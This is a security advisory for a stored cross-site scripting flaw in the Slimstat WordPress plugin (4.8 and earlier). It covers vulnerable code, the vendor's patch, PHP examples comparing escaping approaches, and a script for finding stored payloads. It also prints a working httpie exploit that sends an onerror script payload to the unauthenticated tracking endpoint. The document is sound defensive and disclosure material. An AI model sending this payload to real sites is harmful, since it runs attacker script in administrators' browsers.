Slimstat <= 4.8 - Unauthenticated Stored XSS

Summary

Description               Details
Name                      Slimstat
Summary                   Insufficient sanitization when displaying browser plugin data, allowing attacker-supplied JavaScript to execute in an administrator's browser
Affected application      wp-slimstat
Affected revision         <= 4.8
Vendor update available   Yes
CVE
Ids                       CWE-79
CVSSv3.0 Base Score       6.1
CVSS vector               AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Public exploit available  Yes
Exploit verified          Yes
Authentication required   No

Vulnerable Code

<?php
## admin/view/right-now.php (4.8 and earlier, excerpt around line 191)
if (!empty($results[$i]['plugins'])){
    ## comma-separated list exactly as the tracker received it in the `pl` parameter
    $results[$i]['plugins'] = explode(',', $results[$i]['plugins']);
    foreach($results[$i]['plugins'] as $a_plugin){
        $a_plugin = trim($a_plugin);   ## whitespace only: no escaping before the value reaches three HTML attributes
        $plugins .= "<a class='slimstat-filter-link inline-icon' href='" . wp_slimstat_reports::fs_url( 'plugins contains ' . $a_plugin ) . "'><img class='slimstat-tooltip-trigger' src='$plugin_url/images/plugins/$a_plugin.png' width='16' height='16' title='" . __( $a_plugin, 'wp-slimstat' ) . "'></a> ";
    }
}
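The rendering pattern above, as an added stand-alone example (not Slimstat's code): the vulnerable concatenation, the vendor's quote-stripping fix, and an escape-at-output version, each fed the payload from the exploit below, followed by a crude attribute tokenizer that lists which event-handler attributes the browser would see. PHP 7.4+; `htmlspecialchars()` and `rawurlencode()` stand in for WordPress' `esc_attr()` and `esc_url()`, `fs_url()` is a stub with an assumed URL shape, the `__()` call is dropped because it returns its argument unchanged when no translation matches, and the plugin URL is constructed.

```php
<?php
// Added example, not Slimstat's code. Stand-alone PHP 7.4+: htmlspecialchars()
// and rawurlencode() stand in for WordPress' esc_attr()/esc_url(), which do
// not exist outside WordPress.

// Stand-in for wp_slimstat_reports::fs_url() (assumed shape, only here so the
// script runs without WordPress): builds the report-filter link.
function fs_url(string $filter): string {
    return 'admin.php?page=slimstat-report&fs=' . rawurlencode($filter);
}

// <= 4.8: trim() only, then the raw value lands in href, src and title.
function render_vulnerable(string $plugins_csv, string $plugin_url): string {
    $plugins = '';
    foreach (explode(',', $plugins_csv) as $a_plugin) {
        $a_plugin = trim($a_plugin);
        $plugins .= "<a class='slimstat-filter-link inline-icon' href='" . fs_url('plugins contains ' . $a_plugin) . "'>"
                  . "<img class='slimstat-tooltip-trigger' src='$plugin_url/images/plugins/$a_plugin.png' width='16' height='16' title='$a_plugin'></a> ";
    }
    return $plugins;
}

// Vendor fix: strip both quote characters before interpolation (a denylist).
function render_patched(string $plugins_csv, string $plugin_url): string {
    $plugins = '';
    foreach (explode(',', $plugins_csv) as $a_plugin) {
        $a_plugin = str_replace(array("'", '"'), '', trim($a_plugin));
        $plugins .= "<a class='slimstat-filter-link inline-icon' href='" . fs_url('plugins contains ' . $a_plugin) . "'>"
                  . "<img class='slimstat-tooltip-trigger' src='$plugin_url/images/plugins/$a_plugin.png' width='16' height='16' title='$a_plugin'></a> ";
    }
    return $plugins;
}

// Escape for each context the value lands in: URL component inside the filter
// link, path segment inside src, and HTML attribute text everywhere.
function render_escaped(string $plugins_csv, string $plugin_url): string {
    $plugins = '';
    foreach (explode(',', $plugins_csv) as $a_plugin) {
        $a_plugin = trim($a_plugin);
        $href  = htmlspecialchars(fs_url('plugins contains ' . $a_plugin), ENT_QUOTES | ENT_HTML5, 'UTF-8');
        $src   = htmlspecialchars($plugin_url . '/images/plugins/' . rawurlencode($a_plugin) . '.png', ENT_QUOTES | ENT_HTML5, 'UTF-8');
        $title = htmlspecialchars($a_plugin, ENT_QUOTES | ENT_HTML5, 'UTF-8');
        $plugins .= "<a class='slimstat-filter-link inline-icon' href='$href'>"
                  . "<img class='slimstat-tooltip-trigger' src='$src' width='16' height='16' title='$title'></a> ";
    }
    return $plugins;
}

// Crude tokenizer for the single-quoted markup above: every name='value' pair,
// keeping the names that are event-handler attributes (on*). A real browser
// tokenizes the same way for this markup: a stray quote ends the attribute.
function event_handler_attributes(string $html): array {
    preg_match_all("/\\b([a-zA-Z-]+)='[^']*'/", $html, $m);
    return array_values(array_filter($m[1], fn(string $name): bool => stripos($name, 'on') === 0));
}

$payload    = "plugin'onerror='alert(document.domain)";          // the `pl` value from the advisory
$plugin_url = 'https://wp.example/wp-content/plugins/wp-slimstat'; // constructed

foreach (['vulnerable', 'patched', 'escaped'] as $variant) {
    $fn   = 'render_' . $variant;
    $html = $fn($payload, $plugin_url);
    printf("%-10s on* attributes: %s\n%s\n\n", $variant, json_encode(event_handler_attributes($html)), $html);
}
```

Run with `php`: the vulnerable variant yields two `onerror` attributes (one from `src`, one from `title`), the other two yield none for this payload. The difference between them is that the patched form only removes the two characters this payload needs, while the escaped form encodes whatever arrives for the context it is written into.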

Exploit:

cid=$( http http://slimstatwp.vulnsite.xxyy/  User-Agent:"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Falkon/3.1.0 Chrome/69.0.3497.128 Safari/537.36"   | grep SlimStatParams | awk -F'"' ' {print $20 }'  )

http -v --form http://slimstatwp.vulnsite.xxyy/wp-admin/admin-ajax.php action=slimtrack  op=add  id=$cid  ref=  res=  sw=1280  sh=800  bw=1280  bh=702  sl=1390  pp=532  pl="plugin'onerror='alert(document.domain)" User-Agent:"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Falkon/3.1.0 Chrome/69.0.3497.128 Safari/537.36"

Exploit Methodology

The attacker has to do the following to exploit this vulnerability:

  • Submit a crafted plugins value to the Slimstat tracking endpoint (the `pl` field in the request above, which requires no authentication), then wait for an administrator to view the Slimstat Access Log, where the stored value is rendered and the script runs in the administrator's browser.
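Because the payload is stored, a site that has been running a vulnerable version should check existing records before an administrator opens the report. As an added example (not Slimstat's code), a triage pass over visit records that flags `plugins` values which cannot be browser plugin names. The rows are constructed; in a live check they would be read from the Slimstat visits table (assumed to be `{$wpdb->prefix}slim_stats`, column `plugins`), and the allowlist pattern is an assumption about what the tracker reports.

```php
<?php
// Added example, not Slimstat's code: triage of stored `plugins` values.
// Rows are constructed here; a live check would read them from the Slimstat
// visits table (assumed {$wpdb->prefix}slim_stats, column `plugins`).

// Assumed allowlist: plugin identifiers reported by the tracker are short
// tokens such as "flash", "java" or "pdf", optionally with space, dot,
// underscore or hyphen. Quotes, '=', '<', '(' and the like never belong.
const PLUGIN_NAME_PATTERN = '/^[a-z0-9][a-z0-9 ._\-]{0,63}$/i';

// Splits the stored value the same way right-now.php does and returns the
// entries that fail the allowlist.
function suspicious_plugin_entries(string $plugins_csv): array {
    $flagged = [];
    foreach (explode(',', $plugins_csv) as $a_plugin) {
        $a_plugin = trim($a_plugin);
        if ($a_plugin !== '' && !preg_match(PLUGIN_NAME_PATTERN, $a_plugin)) {
            $flagged[] = $a_plugin;
        }
    }
    return $flagged;
}

// Returns one report entry per record that carries at least one bad entry.
function triage_rows(array $rows): array {
    $report = [];
    foreach ($rows as $row) {
        $bad = suspicious_plugin_entries($row['plugins'] ?? '');
        if ($bad !== []) {
            $report[] = ['id' => $row['id'], 'entries' => $bad];
        }
    }
    return $report;
}

// Constructed records in the shape right-now.php reads ($results[$i]['plugins']).
$rows = [
    ['id' => 101, 'plugins' => 'flash,java,pdf'],
    ['id' => 102, 'plugins' => ''],
    ['id' => 103, 'plugins' => "plugin'onerror='alert(document.domain)"],
];

foreach (triage_rows($rows) as $hit) {
    printf("record %d: %d suspicious plugin entry/entries: %s\n",
        $hit['id'], count($hit['entries']), json_encode($hit['entries']));
}
```

Only record 103 is reported. Flagged records should be removed or have the column blanked before anyone opens the report in an unpatched version; after updating, the check still tells you whether the site was hit while vulnerable.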

Security Patch

diff --git a/wp-content/plugins/wp-slimstat/admin/view/right-now.php b/wp-content/plugins/wp-slimstat/admin/view/right-now.php
index 620d638..69c89a5 100644
--- a/wp-content/plugins/wp-slimstat/admin/view/right-now.php
+++ b/wp-content/plugins/wp-slimstat/admin/view/right-now.php
@@ -189,7 +189,7 @@ for ( $i=0; $i < $count_page_results; $i++ ) {
                if (!empty($results[$i]['plugins'])){
                        $results[$i]['plugins'] = explode(',', $results[$i]['plugins']);
                        foreach($results[$i]['plugins'] as $a_plugin){
-                               $a_plugin = trim($a_plugin);
+                               $a_plugin = str_replace( array( "'", '"' ), '', trim( $a_plugin ) );
                                $plugins .= "<a class='slimstat-filter-link inline-icon' href='" . wp_slimstat_reports::fs_url( 'plugins contains ' . $a_plugin ) . "'><img class='slimstat-tooltip-trigger' src='$plugin_url/images/plugins/$a_plugin.png' width='16' height='16' title='" . __( $a_plugin, 'wp-slimstat' ) . "'></a> ";
                        }
                }
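Review bot: The `+` line at 192 swaps `trim()` for a quote-stripping `str_replace()`, but the unchanged line below it still interpolates the value into three contexts (the `fs_url()` argument in `href`, the path in `src`, the `title` text). Removing `'` and `"` defeats the attribute break shown in the exploit, yet it is a denylist rather than output encoding; the WordPress convention is `esc_url()` around the `fs_url( ... )` result and `esc_attr( $a_plugin )` for the `src` and `title` values, with the `src` path segment also URL-encoded. A second point on the same line: `__( $a_plugin, 'wp-slimstat' )` looks up a visitor-supplied string in the translation catalogue and returns it unchanged when nothing matches, so it is not a sanitizer and its result should also pass through `esc_attr()`.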

References

Sucuri